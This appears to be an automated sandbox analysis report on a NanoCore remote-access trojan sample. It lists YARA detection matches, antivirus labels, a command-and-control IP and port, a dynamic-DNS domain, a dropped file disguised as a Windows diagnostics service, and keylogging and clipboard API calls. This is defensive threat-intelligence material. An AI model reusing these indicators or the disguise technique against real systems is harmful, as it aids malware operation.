1.2.RegAsm.exe.54b0000.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
1.2.RegAsm.exe.54b0000.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
1.2.RegAsm.exe.54b0000.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Click to see the 19 entries

Sigma Overview

System Summary:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 4560, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Avira: detected
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Avira: detected

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Avira: detection malicious, Label: HEUR/AGEN.1100084
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Avira: detection malicious, Label: HEUR/AGEN.1100084

Found malware configuration

Show sources

Source: RegAsm.exe.7108.14.memstr	Malware Configuration Extractor: NanoCore {"C2: ": ["255.255.255.255", "87.65.28.27"], "Version: ": "NanoCore Client, Version=1.2.2.0"}
Source: RegAsm.exe.7108.14.memstr	Malware Configuration Extractor: NanoCore {"C2: ": ["255.255.255.255", "87.65.28.27"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Multi AV Scanner detection for submitted file

Show sources

Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	ReversingLabs: Detection: 68%
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	ReversingLabs: Detection: 68%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY
Source: Yara match	File source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY
Source: Yara match	File source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY
Source: Yara match	File source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE

Source: 1.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 1.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A24696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00A24696
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00A23D4E
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	0_2_00A2C9C7
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2C93C FindFirstFileW,FindClose,	0_2_00A2C93C
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A2F200
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A2F35D
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2F65E FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00A2F65E
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00A23A2B
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A24696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00A24696
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00A23D4E
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	0_2_00A2C9C7
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2C93C FindFirstFileW,FindClose,	0_2_00A2C93C
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A2F200
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A2F35D
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2F65E FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00A2F65E
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00A23A2B
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009E4696 GetFileAttributesW,FindFirstFileW,FindClose,	12_2_009E4696
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	12_2_009E3D4E
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	12_2_009EF200
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	12_2_009EF35D
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009EF65E FindFirstFileW,Sleep,FindNextFileW,FindClose,	12_2_009EF65E
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	12_2_009EC9C7
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009EC93C FindFirstFileW,FindClose,	12_2_009EC93C
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	12_2_009E3A2B
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009EBF27 FindFirstFileW,FindNextFileW,FindClose,	12_2_009EBF27

Networking:

Uses dynamic DNS services

Show sources

Source: unknown	DNS query: name: windowslivesoffice.ddns.net
Source: unknown	DNS query: name: windowslivesoffice.ddns.net

Source: global traffic	TCP traffic: 192.168.2.7:49715 -> 87.65.28.27:20377
Source: global traffic	TCP traffic: 192.168.2.7:49715 -> 87.65.28.27:20377

Source: Joe Sandbox View	IP Address: 87.65.28.27 87.65.28.27
Source: Joe Sandbox View	IP Address: 87.65.28.27 87.65.28.27

Source: Joe Sandbox View	ASN Name: PROXIMUS-ISP-ASBE PROXIMUS-ISP-ASBE
Source: Joe Sandbox View	ASN Name: PROXIMUS-ISP-ASBE PROXIMUS-ISP-ASBE

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,		0_2_00A325E2
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,		0_2_00A325E2

Source: unknown	DNS traffic detected: queries for: windowslivesoffice.ddns.net
Source: unknown	DNS traffic detected: queries for: windowslivesoffice.ddns.net

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,		0_2_00A3425A
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,		0_2_00A3425A

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,		0_2_00A3425A
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,		0_2_00A3425A

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A20219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,		0_2_00A20219
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A20219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,		0_2_00A20219

Source: RegAsm.exe, 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp	Binary or memory string: RegisterRawInputDevices
Source: RegAsm.exe, 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp	Binary or memory string: RegisterRawInputDevices

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A4CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	0_2_00A4CDAC
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A4CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	0_2_00A4CDAC
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_00A0CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	12_2_00A0CDAC

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY
Source: Yara match	File source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY
Source: Yara match	File source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY
Source: Yara match	File source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
